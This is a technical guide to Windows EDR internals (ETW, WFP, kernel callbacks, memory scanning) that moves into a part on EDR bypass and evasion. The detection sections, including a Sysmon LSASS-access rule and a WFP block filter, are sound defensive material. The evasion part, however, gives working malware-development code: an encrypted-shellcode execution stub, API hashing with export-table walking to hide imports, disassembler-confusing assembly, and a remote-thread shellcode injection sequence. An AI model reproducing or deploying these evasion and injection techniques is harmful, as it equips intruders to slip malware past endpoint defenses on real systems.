| `Microsoft-Windows-Kernel-Memory` | Memory allocation and protection-change events |
| `Microsoft-Windows-DotNETRuntime` | Assembly.Load, JIT compilation, app-domain creation |
| `Microsoft-Antimalware-Scan-Interface` (AMSI) | AMSI scan request and result events for scripts and .NET assemblies |
| `Microsoft-Windows-PowerShell` | EID 4104 script-block logging (decoded script content) |

Provider enumeration on a target system:

```powershell
# enumerate registered providers
logman query providers

# enumerate enabled event channels
Get-WinEvent -ListLog * | Where-Object IsEnabled -eq $true | Sort-Object LogName

# query active trace sessions
logman query -ets
```

The Threat-Intelligence provider has architectural properties that distinguish it from standard ETW providers:

- The events are emitted from the kernel image (`ntoskrnl.exe`), not from user-mode code paths. Patching `ntdll!EtwEventWrite` in a user-mode process does not affect TI provider emission.

- Events fire after the kernel operation completes. A user-mode bypass cannot prevent the event from being recorded.

- Consumer processes must be marked as PPL-Antimalware (`PsProtectedSignerAntimalware`). Standard SYSTEM-context processes are denied subscription.

The SecurityTrace flag technique published in early 2026 demonstrated consumption of a subset of TI events without PPL via abuse of the SecurityTrace flag exposed through EtwEnumerateProcessRegGuids and related APIs. Microsoft has historically remediated TI subscription bypasses within one or two Windows servicing releases.



Windows Filtering Platform (WFP)

Network-layer detection and inline blocking are implemented through WFP.

WFP architecture defines three primary entity types:

- Layers: defined points in the network stack (`FWPM_LAYER_ALE_AUTH_CONNECT_V4`, `FWPM_LAYER_STREAM_V4`, `FWPM_LAYER_DATAGRAM_DATA_V4`, etc.). Each logical layer is paired by IP version and identified by GUID.

- Filters: attached to a layer, evaluated against per-flow conditions. Filter action types: `FWP_ACTION_PERMIT`, `FWP_ACTION_BLOCK`, `FWP_ACTION_CONTINUE`, `FWP_ACTION_CALLOUT_TERMINATING`, `FWP_ACTION_CALLOUT_INSPECTION`, `FWP_ACTION_CALLOUT_UNKNOWN`.

- Callouts: driver-implemented routines invoked by filter actions. The classify callout inspects packet or connection metadata and returns a verdict.

WFP Architecture

Layers, Filters, and Callouts

WFP is a kernel-mode framework that enables network traffic inspection and modification at multiple points in the network stack. The architecture is built around three interconnected entities that work together to provide fine-grained control over network traffic:

Layers represent specific points in the network processing pipeline where decisions can be made. WFP provides numerous built-in layers covering the entire network stack from raw IP packets to application-layer connections. Each layer has a specific purpose and is identified by a unique GUID. Key layer categories include:

- Application Layer Enforcement (ALE): connection authorization, accept, and close operations

- Datagram and Stream layers: per-packet and per-flow inspection points

- IPsec layers: VPN and encryption policy enforcement

- Resource Assignment layers: port and IP address allocation

Filters are the policy rules that define what action to take when specific conditions are met. Each filter is associated with a layer and contains one or more conditions (matching criteria) and an action. Filter conditions can match on fields such as source/destination IP addresses, ports, protocol numbers, application IDs, user identities, and interface indices. Filters are evaluated in order of weight within each sublayer, and the first matching terminating filter determines the action for that sublayer; the layer’s final decision then combines the results of its sublayers.
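The weight-ordered, first-match behavior inside a single sublayer can be modeled in a few lines of Python. This is a deliberately simplified sketch: conditions are reduced to exact-match fields, callouts and cross-sublayer arbitration are left out, and the dictionary layout is an assumption made for illustration.

```python
def evaluate_sublayer(filters: list, flow: dict):
    """Return the action of the highest-weight filter whose conditions all match."""
    for flt in sorted(filters, key=lambda f: f["weight"], reverse=True):
        if all(flow.get(field) == value for field, value in flt["conditions"].items()):
            return flt["action"]
    return None  # no filter in this sublayer matched

# Hypothetical filters: a broad permit and a narrower, heavier block.
example_filters = [
    {"weight": 10, "conditions": {"remote_port": 443}, "action": "FWP_ACTION_PERMIT"},
    {"weight": 50, "conditions": {"remote_port": 443, "app": "evil.exe"},
     "action": "FWP_ACTION_BLOCK"},
]
```

Because the block filter carries the higher weight, a flow from `evil.exe` to port 443 is blocked even though the broader permit filter also matches it.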

Callouts are the extensibility mechanism of WFP. They allow third-party drivers (such as EDR products) to implement custom inspection logic that goes beyond the built-in permit/block actions. A callout consists of three functions:

- Classify function: called when a filter referencing the callout matches. Receives packet/connection metadata and returns a verdict (permit, block, or pending).

- Notify function: called when filters referencing the callout are added or removed.

- Flow-delete function: called when a flow associated with the callout is terminated.

The relationship between these three entities: a layer hosts filters, filters reference callouts, and callouts execute custom driver code that inspects traffic and returns a verdict.

WFP architecture: network packets traverse layers, match against filters, and invoke callouts for custom driver inspection. The callout returns a verdict that determines whether the packet is permitted, blocked, or pended for asynchronous inspection.


WFP API

WFP provides a user-mode API through fwpuclnt.dll and a kernel-mode API through fwpkclnt.sys. The API operates on a session-based model where an application opens a handle to the filter engine, performs operations, and closes the session.

Core API functions:

| Function | Purpose |
|---|---|
| `FwpmEngineOpen` | Establishes a session with the filter engine |
| `FwpmEngineClose` | Closes the session and releases resources |
| `FwpmFilterAdd` | Adds a new filter to a layer |
| `FwpmFilterDeleteById` | Removes a filter by its runtime ID |
| `FwpmFilterEnum` | Enumerates existing filters |
| `FwpmCalloutAdd` | Registers a driver callout with the engine |
| `FwpmSubLayerAdd` | Creates a custom sublayer |
| `FwpmProviderAdd` | Registers a provider (organizational container) |
| `FwpmGetAppIdFromFileName` | Converts a file path to an application identifier blob |

The API uses RPC to communicate between user mode and the Base Filtering Engine (BFE) service, a user-mode service that maintains the filter database and pushes filters to the kernel-mode filter engine. All operations are subject to access checks: modifying system-level filters requires the FWPM_ACTRL_ADD permission and typically administrator privileges.

Filters and Callouts

Filters are the primary control mechanism in WFP. Each filter has these properties:

- Layer key: which WFP layer the filter applies to

- Sublayer key: which sublayer within the layer (determines evaluation order)

- Weight: determines ordering among filters in the same sublayer (higher = evaluated first)

- Action: what to do when conditions match: `FWP_ACTION_PERMIT`, `FWP_ACTION_BLOCK`, or `FWP_ACTION_CALLOUT_*`

- Conditions: array of matching criteria with field key, match type, and value

- Filter flags: optional modifiers such as `FWPM_FILTER_FLAG_PERSISTENT`

When a filter action is FWP_ACTION_CALLOUT_TERMINATING or FWP_ACTION_CALLOUT_INSPECTION, the filter engine invokes the registered callout driver’s classify function. The callout receives:

- Classification parameters: layer-specific metadata including packet headers, connection state, and process information

- Filter action context: 64-bit value stored with the filter, often used as a policy identifier

- Layer data: raw packet data for stream layers, connection information for ALE layers

The callout’s classify function examines this data and returns one of: FWP_ACTION_PERMIT, FWP_ACTION_BLOCK, or FWP_ACTION_NONE (if the callout needs to pend the decision asynchronously).

EDR products primarily use terminating callouts at ALE connect layers to inspect outbound connections before they are established, and stream inspection callouts to examine packet payloads for data exfiltration detection.



Layers and Sublayers

Layers in WFP are organized hierarchically along the network processing path. The most important layers for EDR network filtering:

| Layer | Purpose | Key Conditions |
|---|---|---|
| FWPM_LAYER_INBOUND_IPPACKET_V4/V6 | Raw inbound IP packets before reassembly | Source/dest IP, protocol, interface |
| FWPM_LAYER_OUTBOUND_IPPACKET_V4/V6 | Raw outbound IP packets after fragmentation | Source/dest IP, protocol, interface |
| FWPM_LAYER_IPFORWARD_V4/V6 | IP forwarding decisions | Route information |
| FWPM_LAYER_INBOUND_TRANSPORT_* | Transport-layer inbound (TCP/UDP) | Source/dest ports |
| FWPM_LAYER_OUTBOUND_TRANSPORT_* | Transport-layer outbound | Source/dest ports |
| FWPM_LAYER_STREAM_V4/V6 | TCP stream data (per-packet) | Direction, data offset |
| FWPM_LAYER_DATAGRAM_DATA_V4/V6 | UDP datagram data | Source/dest ports |
| FWPM_LAYER_ALE_AUTH_CONNECT_V4/V6 | Outbound connection authorization | App ID, user SID, remote IP/port |
| FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4/V6 | Inbound connection acceptance | Local port, remote IP, interface |
| FWPM_LAYER_ALE_FLOW_ESTABLISHED_* | Post-connection established notification | Connection tuples, process info |
| FWPM_LAYER_ALE_RESOURCE_ASSIGNMENT_* | Port/IP binding authorization | Protocol, local address |

Sublayers provide finer-grained ordering within a layer. Each layer can have multiple sublayers, and filters within a sublayer are evaluated as a group. Evaluation proceeds through sublayers in descending weight order. The default sublayer is FWPM_SUBLAYER_UNIVERSAL, which has weight 0. EDR products typically create their own sublayer with a high positive weight to ensure their filters are evaluated before the Windows Firewall filters.

Filter evaluation within a sublayer proceeds by weight (highest first) until a terminating action (permit or block) is reached. If no filter in the sublayer matches, evaluation moves to the next sublayer. If all sublayers are exhausted without a terminating action, the default action (usually permit) is applied.
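The evaluation order described above can be modeled in a few lines. This is a simplified sketch of that description only, not of the real filter engine: the `model_filter` struct and `model_evaluate` function are hypothetical names, and Microsoft's filter arbitration documentation describes additional rules (such as how a block in one sublayer interacts with a permit in another) that are deliberately left out.

```c
#include <stddef.h>
#include <stdint.h>

typedef enum { ACT_PERMIT, ACT_BLOCK } model_action;

/* Hypothetical, flattened view of one filter at a single layer. */
typedef struct {
    uint16_t     sublayer_weight; /* weight of the sublayer holding the filter */
    uint64_t     filter_weight;   /* weight of the filter inside that sublayer */
    int          matches;         /* 1 if the filter's conditions match        */
    model_action action;          /* terminating action of the filter          */
} model_filter;

/*
 * Sublayers are visited in descending weight order; inside a sublayer the
 * highest-weight matching filter terminates evaluation. That is equivalent
 * to picking the matching filter with the largest (sublayer, filter) weight
 * pair. With no match at all, the default action (permit) applies.
 */
model_action model_evaluate(const model_filter *f, size_t n)
{
    const model_filter *best = NULL;
    for (size_t i = 0; i < n; i++) {
        if (!f[i].matches)
            continue;
        if (best == NULL ||
            f[i].sublayer_weight > best->sublayer_weight ||
            (f[i].sublayer_weight == best->sublayer_weight &&
             f[i].filter_weight > best->filter_weight))
            best = &f[i];
    }
    return best ? best->action : ACT_PERMIT;
}
```

In this model, a block filter placed in a high-weight sublayer wins over a permit filter in a lower-weight sublayer, which is the reason the text gives for EDR products registering their own high-weight sublayer.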

WFP network layer stack: packets traverse from inbound IP packet layers through transport, stream/datagram, and ALE layers before reaching the application layer. Each layer provides a distinct inspection point.

Block all outbound network traffic from a specific executable via WFP filter:

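```cpp
#include <windows.h>
#include <fwpmu.h>
#pragma comment(lib, "fwpuclnt.lib")

// Fragment: error handling omitted. Requires administrator privileges.
HANDLE engine = nullptr;
FwpmEngineOpen(nullptr, RPC_C_AUTHN_DEFAULT, nullptr, nullptr, &engine);

// Convert the image path into the app-ID blob that ALE conditions match on.
// Backslashes must be escaped: "\b" and "\r" are escape sequences.
FWP_BYTE_BLOB* appId = nullptr;
FwpmGetAppIdFromFileName(L"C:\\bin\\rubeus.exe", &appId);

// Single condition: the connecting application equals the blob above.
FWPM_FILTER_CONDITION cond = {};
cond.fieldKey = FWPM_CONDITION_ALE_APP_ID;
cond.matchType = FWP_MATCH_EQUAL;
cond.conditionValue.type = FWP_BYTE_BLOB_TYPE;
cond.conditionValue.byteBlob = appId;

// Block filter at the IPv4 outbound connection authorization layer.
FWPM_FILTER filter = {};
WCHAR name[] = L"Block rubeus net";
filter.displayData.name = name;
filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V4;
filter.action.type = FWP_ACTION_BLOCK;
filter.numFilterConditions = 1;
filter.filterCondition = &cond;

UINT64 fid = 0;  // receives the runtime filter ID
FwpmFilterAdd(engine, &filter, nullptr, &fid);

FwpmFreeMemory((void**)&appId);
FwpmEngineClose(engine);
```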

EDR products use WFP callouts for both inline blocking and connection metadata enrichment. Each outbound connection is annotated with process identity, image signature status, and historical fleet-wide reputation for the destination IP / ASN / SNI. Anomalies in this annotated dataset feed cloud-side correlation rules.

EDRSilencer and similar tools weaponize this exact subsystem inversely: they install WFP filters that block the EDR agent’s own outbound traffic to the vendor cloud. The kernel callbacks continue to fire, telemetry continues to be collected locally, but transmission to the cloud-side correlation engine is suppressed.

Part 2 Detection Techniques

Detection via Kernel Callbacks

The kernel callback APIs documented in Part 1 are the primary feed for behavioral detection rules. Common rule patterns mapped to each callback type:

- Process creation callback → process-lineage rules. Detection examples: Office process spawning cmd.exe/powershell.exe, services.exe parent mismatch on a non-service process, command-line entropy analysis, base64 string detection in command line, suspicious -encoded/-enc PowerShell arguments.

- Thread creation callback → cross-process thread creation. Detection rule: Thread.OwningProcess != Source.Process. This event fires for every CreateRemoteThread and NtCreateThreadEx invocation regardless of user-mode hook bypass.

- Image load callback → unsigned DLL load into signed process, image load from user-writable paths (%TEMP%, %APPDATA%), DLL sideloading detection (signed binary loading an unsigned DLL from the same directory), image load from MEM_PRIVATE regions (reflective DLL loaders).

- Object pre-operation callback → handle access-mask reduction. Targets typically include lsass.exe, csrss.exe, MsMpEng.exe, and the EDR’s own user-mode service.

- Registry callback → autostart-key writes, Windows Defender configuration tampering, security policy modifications, EDR self-tamper detection on the EDR’s own registry hives.
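As an illustration of the "base64 string detection in command line" rule listed above, the following is a minimal detection-side sketch. The function names and the threshold parameter are assumptions made for this example; production rules typically combine a check like this with entropy scoring and argument parsing.

```c
#include <ctype.h>
#include <stddef.h>

/* Characters of the standard base64 alphabet, including padding. */
static int is_b64_char(unsigned char c)
{
    return isalnum(c) || c == '+' || c == '/' || c == '=';
}

/* Length of the longest uninterrupted run of base64-alphabet characters. */
size_t longest_b64_run(const char *cmdline)
{
    size_t best = 0, cur = 0;
    for (const unsigned char *p = (const unsigned char *)cmdline; *p; p++) {
        cur = is_b64_char(*p) ? cur + 1 : 0;
        if (cur > best)
            best = cur;
    }
    return best;
}

/* Flags a command line whose longest base64-like run reaches the threshold. */
int looks_base64_encoded(const char *cmdline, size_t threshold)
{
    return longest_b64_run(cmdline) >= threshold;
}
```

Ordinary words and path components also consist of base64-alphabet characters, so the threshold has to sit well above typical token lengths to keep the false-positive rate manageable.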

The access-mask stripping performed by the object-handle pre-operation callback is the most commonly encountered detection during credential-access engagements. A call to OpenProcess(PROCESS_ALL_ACCESS, FALSE, lsass_pid) succeeds and returns a valid handle, but querying the handle (for example with NtQueryObject and ObjectBasicInformation) reveals that the granted access has been reduced to PROCESS_QUERY_LIMITED_INFORMATION. Subsequent ReadProcessMemory calls fail with ERROR_ACCESS_DENIED.

Sysmon implements an equivalent detection in user-mode telemetry: Event ID 10 (ProcessAccess) records process-handle access requests with the granted-access mask:

```xml
<!-- Sysmon: ProcessAccess to LSASS, suspicious mask combos -->
<RuleGroup name="LSASS handle" groupRelation="or">
  <ProcessAccess onmatch="include">
    <TargetImage condition="image">lsass.exe</TargetImage>
    <GrantedAccess>0x1010</GrantedAccess> <!-- VM_READ | QUERY_LIMITED -->
    <GrantedAccess>0x1410</GrantedAccess>
    <GrantedAccess>0x1438</GrantedAccess>
    <GrantedAccess>0x143A</GrantedAccess>
    <GrantedAccess>0x1FFFFF</GrantedAccess> <!-- ALL_ACCESS -->
  </ProcessAccess>
</RuleGroup>
```
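The GrantedAccess values in the rule are easier to triage once decoded into named rights. A minimal sketch follows, assuming only the process-specific access bits from the Windows SDK headers; `describe_access` is a hypothetical helper name, and standard rights (such as those included in 0x1FFFFF) are intentionally not listed.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Process-specific access rights; values as defined in the Windows SDK. */
static const struct { uint32_t bit; const char *name; } k_rights[] = {
    {0x0001, "PROCESS_TERMINATE"},
    {0x0002, "PROCESS_CREATE_THREAD"},
    {0x0008, "PROCESS_VM_OPERATION"},
    {0x0010, "PROCESS_VM_READ"},
    {0x0020, "PROCESS_VM_WRITE"},
    {0x0040, "PROCESS_DUP_HANDLE"},
    {0x0080, "PROCESS_CREATE_PROCESS"},
    {0x0100, "PROCESS_SET_QUOTA"},
    {0x0200, "PROCESS_SET_INFORMATION"},
    {0x0400, "PROCESS_QUERY_INFORMATION"},
    {0x0800, "PROCESS_SUSPEND_RESUME"},
    {0x1000, "PROCESS_QUERY_LIMITED_INFORMATION"},
};

/* Writes a '|'-separated list of the rights set in mask into out. */
char *describe_access(uint32_t mask, char *out, size_t cap)
{
    if (cap == 0)
        return out;
    out[0] = '\0';
    for (size_t i = 0; i < sizeof k_rights / sizeof k_rights[0]; i++) {
        if (!(mask & k_rights[i].bit))
            continue;
        size_t len = strlen(out);
        /* snprintf truncates safely if the buffer is too small. */
        snprintf(out + len, cap - len, "%s%s", len ? "|" : "", k_rights[i].name);
    }
    return out;
}
```

Decoding 0x1010 yields PROCESS_VM_READ and PROCESS_QUERY_LIMITED_INFORMATION, matching the comment in the rule; 0x143A additionally carries PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_WRITE, and PROCESS_QUERY_INFORMATION.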



User-Mode API Hooking Techniques

User-mode API hooking is the in-process detection mechanism deployed by every commercial EDR product.

Three hooking strategies. Modern EDRs have converged on inline patches in ntdll’s Nt* stubs.

Import Address Table (IAT) hooking. The hook installer walks the target module’s PE Import Address Table and overwrites function-pointer entries with addresses of replacement routines. Defeated by any code path that resolves imports via GetProcAddress rather than the static IAT, because such resolutions read the export table directly and bypass the patched IAT entry. Used historically by lightweight monitoring products; rarely the primary mechanism in modern EDRs.

Inline (Detours-style) hooking. The hook installer overwrites the first 5–14 bytes of the target function with a JMP rel32 (or MOV RAX, imm64; JMP RAX for 64-bit absolute) to the replacement routine. The overwritten bytes are preserved in a trampoline that allows the original function to be invoked after inspection. This is the dominant hooking model in current commercial EDR products. Reference implementations:

- Microsoft Detours: Microsoft’s reference implementation

- MinHook: minimal-footprint x86/x64 implementation

- EasyHook: managed-code wrapper

SetWindowsHookEx hooking. Win32 message-pump callback registration. Forces injection of a DLL into every GUI process that pumps Windows messages. Limitations: only targets processes with a Windows message pump, generates highly visible IOCs (the hook DLL appears in the module list of every hooked GUI process), and the bitness of the hook DLL must match the target process. Used historically by accessibility tools and keyloggers; not deployed as a primary mechanism in modern EDR.

In-process unhooking strategies that read a fresh copy of ntdll.dll from disk and restore the .text section have diminished significantly in efficacy against first-tier EDR products. CrowdStrike Falcon and SentinelOne deploy signature detection for the unhooking byte-sequence pattern. Microsoft Defender for Endpoint relies primarily on kernel callbacks and the ETW-TI provider rather than user-mode inline hooks, making the entire user-mode unhook step strategically irrelevant against MDE. Detection commentary documented by reprgm reflects this shift.

Memory-Based Detection

EDR memory-scanner implementations perform periodic and on-demand scans of per-process Virtual Address Descriptor (VAD) trees, classifying memory regions and applying heuristics:

- Region classification: image-backed (mapped from a PE on disk), mapped data (file mapping of non-PE data), or private commit (MEM_PRIVATE).

- Protection-state transitions: PAGE_READWRITE → PAGE_EXECUTE_READWRITE or PAGE_EXECUTE_READ is a high-signal indicator of in-memory shellcode unpacking or sleep-mask plaintext exposure windows.

- Backing-file integrity check: for image-backed regions, compare the in-memory bytes against the corresponding file offsets on disk. Divergence indicates module stomping.

- PEB loader-data consistency: enumerate the PEB.Ldr.InMemoryOrderModuleList and compare against the VAD-derived module list. Modules present in VAD but absent from PEB.Ldr indicate reflective or hand-mapped image loading.

The detection pattern that flags virtually every unmodified shellcode loader:

```
Region @ 0x000001D2A0000000  size 0x10000
  protection: PAGE_EXECUTE_READWRITE
  type:       MEM_PRIVATE
  state:      MEM_COMMIT
  backed by:  <none>   ← unbacked executable private commit
```
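From the scanner's side, the pattern above reduces to a three-field test on each region record. The sketch below assumes a hypothetical `region_info` struct mirroring the relevant MEMORY_BASIC_INFORMATION fields; the `RGN_`-prefixed constants carry the same values as the Windows SDK constants they are named after, redefined here so the example compiles without Windows headers.

```c
#include <stdint.h>

/* Same numeric values as the corresponding Windows SDK constants. */
enum {
    RGN_PAGE_EXECUTE           = 0x10,
    RGN_PAGE_EXECUTE_READ      = 0x20,
    RGN_PAGE_EXECUTE_READWRITE = 0x40,
    RGN_PAGE_EXECUTE_WRITECOPY = 0x80,
    RGN_MEM_COMMIT             = 0x1000,
    RGN_MEM_PRIVATE            = 0x20000,
    RGN_MEM_IMAGE              = 0x1000000
};

/* Hypothetical record holding the fields a scanner reads per region. */
typedef struct {
    uint64_t base;
    uint64_t size;
    uint32_t protect;
    uint32_t state;
    uint32_t type;
} region_info;

/* Returns 1 for committed, private (unbacked) memory with any execute right. */
int is_unbacked_executable(const region_info *r)
{
    const uint32_t exec_mask = RGN_PAGE_EXECUTE | RGN_PAGE_EXECUTE_READ |
                               RGN_PAGE_EXECUTE_READWRITE |
                               RGN_PAGE_EXECUTE_WRITECOPY;
    return r->state == RGN_MEM_COMMIT &&
           r->type == RGN_MEM_PRIVATE &&
           (r->protect & exec_mask) != 0;
}
```

JIT-compiling runtimes legitimately produce regions that satisfy this test, so a real scanner treats a hit as one input to further heuristics, not as a verdict.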

Counter-tradecraft against memory scanning (sleep obfuscation, module stomping, phantom DLL hollowing) is covered in Part 3.

Additional Detection Surfaces

Detection logic also operates against telemetry sources outside the standard kernel-callback and inline-hook surfaces:

- COM hijacking: registry writes to HKCU\Software\Classes\CLSID\{guid}\InprocServer32 redirect COM activations to attacker-controlled DLLs. Detected by the registry callback.

- WMI permanent event subscriptions: the __EventFilter + CommandLineEventConsumer + __FilterToConsumerBinding triple constitutes a persistent execution mechanism. Sysmon Event IDs 19 (filter created), 20 (consumer created), and 21 (binding created) instrument this surface.

- Scheduled task creation: ITaskService::SaveTask (or schtasks.exe invocation) from a non-Microsoft-signed parent process.

- Handle-table inventory: long-lived handles to lsass.exe or other sensitive processes flagged by duration heuristics.

- Anomalous process parent-child relationships: winword.exe → mshta.exe, outlook.exe → cmd.exe, services.exe → unsigned-image, baseline-deviation rules.
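The parent-child rules in the last item can be sketched as a static lookup. This is an illustrative minimum, assuming image base names have already been extracted from the process-creation event; the table holds only the two concrete pairs named above, and `is_suspicious_lineage` is a hypothetical name. Real products layer baseline-deviation scoring on top of fixed pairs like these.

```c
#include <ctype.h>
#include <stddef.h>

/* Case-insensitive string equality (Windows image names are not case-sensitive). */
static int ieq(const char *a, const char *b)
{
    while (*a && *b) {
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b))
            return 0;
        a++;
        b++;
    }
    return *a == *b;
}

/* Parent -> child pairs taken from the examples in the text. */
static const struct { const char *parent; const char *child; } k_pairs[] = {
    {"winword.exe", "mshta.exe"},
    {"outlook.exe", "cmd.exe"},
};

/* Returns 1 if the (parent, child) image pair is on the static list. */
int is_suspicious_lineage(const char *parent, const char *child)
{
    for (size_t i = 0; i < sizeof k_pairs / sizeof k_pairs[0]; i++) {
        if (ieq(parent, k_pairs[i].parent) && ieq(child, k_pairs[i].child))
            return 1;
    }
    return 0;
}
```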

If you want to know exactly what a product watches, cross-reference these against the providers in logman query providers. Anything subscribed and not blocked is being recorded.

Part 3 EDR Bypass and Evasion

Note: All techniques in this part are intended for authorized red-team engagements, capture-the-flag exercises, and security research. Application against systems without explicit written authorization is unlawful in most jurisdictions.

Bypass techniques are organized by the detection layer each addresses. Layered evasion stack, in order of detection-engine pipeline traversal: static-analysis evasion, import-table concealment, behavioral-signature evasion, user-mode hook bypass, memory-scanner evasion, sleep obfuscation, call-stack spoofing, and residual kernel-mode telemetry that survives all preceding layers.

FUD Malware vs Targeted EDR Bypass

Two distinct development paradigms apply to EDR evasion:

| | FUD (Fully Undetectable) malware | Targeted EDR bypass |
|---|---|---|
| Objective | Evade detection across all known products simultaneously | Defeat a single specific product (MDE, Falcon, SentinelOne, etc.) |
| Construction | Generic packer / crypter, off-the-shelf loader | Hand-crafted, product-specific |
| Operational lifespan | Hours to days before signature distribution | Weeks to months |
| Reconnaissance overhead | Minimal | Extensive lead-gathering against the target product |
| Hook awareness | Generic | Vendor-specific binary names, hook addresses, IPC ports |
| Operational noise | High | Low |
| Use case | High-volume commodity campaigns | Engagement-grade red team operations |

Targeted bypass development is a research process. FUD is a packaging process. Engagement-grade operations require targeted development.

Static Analysis Evasion

Symbol and Section Renaming

The lowest-cost static-analysis evasion. Replaces function names, variable names, section names, exported symbols, and imported symbols with non-descriptive identifiers. Defeats string-based YARA rules, hash-table lookups against known function names, and human reverse-engineering by indicator-of-attack matching.

```c
// before
DWORD InjectShellcode(HANDLE hProc, BYTE* sc, SIZE_T sz);

// after
DWORD a8x91(HANDLE q, BYTE* w, SIZE_T e);
```

PE section names are renamed in conjunction: .text → .qx0a, .data → .dD1f, .rdata → .rR2k. Per-build randomization, which generates a fresh symbol and section name set for every compiled artifact (as implemented in Crystal Palace UDRL), defeats name-based static signatures because each artifact presents a unique fingerprint.

Control-Flow Obfuscation

Insertion of bogus conditional branches and unreachable code disrupts linear disassembly. Static analyzers either follow both branches (increasing analysis time and triggering entropy heuristics) or follow only one branch and miss the real logic.

```c
__attribute__((naked))
static void confuse_disassembler(void)
{
    __asm__ volatile (
        "push %%rax \n\t"
        "movabs $0xDEADC0DEDEADBEEF, %%rax \n\t"
        "xor %%rax, %%rax \n\t"   // always zero
        "jz 1f \n\t"              // always taken
        ".byte 0xCC \n\t"         // never executed (int3)
        "1: \n\t"
        "pop %%rax \n\t"
        :
        :
        : "memory"
    );
}
```

Tooling: LLVM-Obfuscator, Tigress, Hikari. For managed code: ConfuserEx is widely deployed against commodity AV but produces highly identifiable output patterns.

Compile-Time String and Code Encryption

Sensitive strings and shellcode are encrypted at build time, decrypted into a stack buffer immediately before use, and zeroed after use. Plaintext is never present in the on-disk binary, eliminating string-based static signatures.

```c
#include <stdint.h>
#include <string.h>

// Build-time key + ciphertext. Real version generates these from a Python build script.
static const uint8_t k[32] = { /* 32 bytes from the build script */ };
static const uint8_t ct[] = { /* AES-256-CTR ciphertext */ };

void invoke(void)
{
    uint8_t pt[sizeof ct];
    aes256_ctr(k, /*nonce*/ k + 16, ct, pt, sizeof ct);
    /* ...use pt as shellcode / string / config... */
    void (*entry)(void) = (void (*)(void)) pt;
    entry();
    SecureZeroMemory(pt, sizeof pt);
}
```

Combined with dynamic API resolution (next section), runtime decryption eliminates the two strongest static-analysis indicators simultaneously: plaintext strings and import-table entries.

Import Address Table Evasion

The Import Address Table is among the highest-value static signals available to an EDR. The combination WriteProcessMemory + CreateRemoteThread in the IAT is sufficient grounds for classification as an injection tool by signature-only logic. Two evasion approaches:

Runtime API Resolution

The compiled binary imports only LoadLibraryA and GetProcAddress. All other Windows API addresses are resolved at runtime via GetProcAddress calls, eliminating their entries from the IAT.

API Hashing

The compiled binary contains neither the function names nor any import-table reference. API names are hashed at compile time, the hash constants are embedded in the binary, and at runtime the loaded modules’ export directories are enumerated and the export-name hash is computed and compared against the embedded constants.

Reference implementation using FNV-1a:

```c
#include <windows.h>
#include <stdint.h>

static uint32_t fnv1a(const char *s) {
    uint32_t h = 0x811C9DC5u;
    while (*s) { h ^= (uint8_t)*s++; h *= 0x01000193u; }
    return h;
}

#define HASH_OPEN_PROCESS   0xCE16C575u  // precomputed at build
#define HASH_VIRT_ALLOC_EX  0x91AFCA54u
#define HASH_WRITE_PROC_MEM 0x6F6E59E1u

static FARPROC find_export(HMODULE mod, uint32_t want)
{
    PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)mod;
    PIMAGE_NT_HEADERS nt = (PIMAGE_NT_HEADERS)((BYTE*)mod + dos->e_lfanew);
    DWORD expRva = nt->OptionalHeader.DataDirectory
                       [IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
    if (!expRva) return NULL;

    PIMAGE_EXPORT_DIRECTORY ed =
        (PIMAGE_EXPORT_DIRECTORY)((BYTE*)mod + expRva);
    DWORD *names = (DWORD*)((BYTE*)mod + ed->AddressOfNames);
    WORD  *ords  = (WORD *)((BYTE*)mod + ed->AddressOfNameOrdinals);
    DWORD *rvas  = (DWORD*)((BYTE*)mod + ed->AddressOfFunctions);

    for (DWORD i = 0; i < ed->NumberOfNames; i++) {
        const char *name = (const char*)((BYTE*)mod + names[i]);
        if (fnv1a(name) == want)
            return (FARPROC)((BYTE*)mod + rvas[ords[i]]);
    }
    return NULL;
}

typedef HANDLE (WINAPI *fOpenProcess)(DWORD, BOOL, DWORD);

HMODULE k32 = (HMODULE) /* PEB walk */ 0;  /* see "Walking the PEB" */
fOpenProcess pOpen = (fOpenProcess) find_export(k32, HASH_OPEN_PROCESS);
```
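The same hash is equally useful on the analysis side: given a constant recovered from a sample, hashing a list of candidate export names recovers the API it stands for. The sketch below is a portable illustration with hypothetical names (`fnv1a32`, `resolve_hash`); the candidate list is an assumption supplied by the analyst, and the constants shown in the listing above have not been verified against it.

```c
#include <stddef.h>
#include <stdint.h>

/* 32-bit FNV-1a over a NUL-terminated string. */
uint32_t fnv1a32(const char *s)
{
    uint32_t h = 0x811C9DC5u;            /* FNV offset basis */
    while (*s) {
        h ^= (uint8_t)*s++;
        h *= 0x01000193u;                /* FNV prime; wraps modulo 2^32 */
    }
    return h;
}

/* Returns the candidate whose hash equals want, or NULL if none matches. */
const char *resolve_hash(uint32_t want, const char *const *names, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        if (fnv1a32(names[i]) == want)
            return names[i];
    }
    return NULL;
}
```

Feeding the full export list of kernel32.dll and ntdll.dll through `resolve_hash` turns a table of opaque constants back into API names, which is why hash-based import concealment slows static triage more than it prevents it.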

Locating kernel32.dll without LoadLibrary (and without an IAT entry) requires walking the Process Environment Block’s loader-data list. The standard sequence: gs:[0x60] → PEB → Ldr → InMemoryOrderModuleList → enumerate LDR_DATA_TABLE_ENTRY records → match on BaseDllName. This sequence is present in nearly every shellcode loader.

Summary: The static-evasion stack (symbol/section renaming, control-flow obfuscation, compile-time encryption, runtime API resolution, API hashing) eliminates virtually all signature-based static detection. Detection past this point is dynamic and behavioral.

Process and Code Injection Techniques



Comparison of injection techniques by detection footprint. APC injection and module stomping produce the lowest behavioral signal; classic remote-thread and process hollowing produce the highest.

Remote Thread Creation (T1055.001)

The classic injection sequence: open target process, allocate executable memory, write payload, create remote thread executing the payload.

```c
HANDLE h = OpenProcess(PROCESS_ALL_ACCESS, FALSE, target_pid);
LPVOID rmt = VirtualAllocEx(h, NULL, sz,
                            MEM_COMMIT | MEM_RESERVE,
                            PAGE_EXECUTE_READWRITE);
WriteProcessMemory(h, rmt, sc, sz, NULL);
CreateRemoteThread(h, NULL, 0, (LPTHREAD_START_ROUTINE)rmt, NULL, 0, NULL);
```

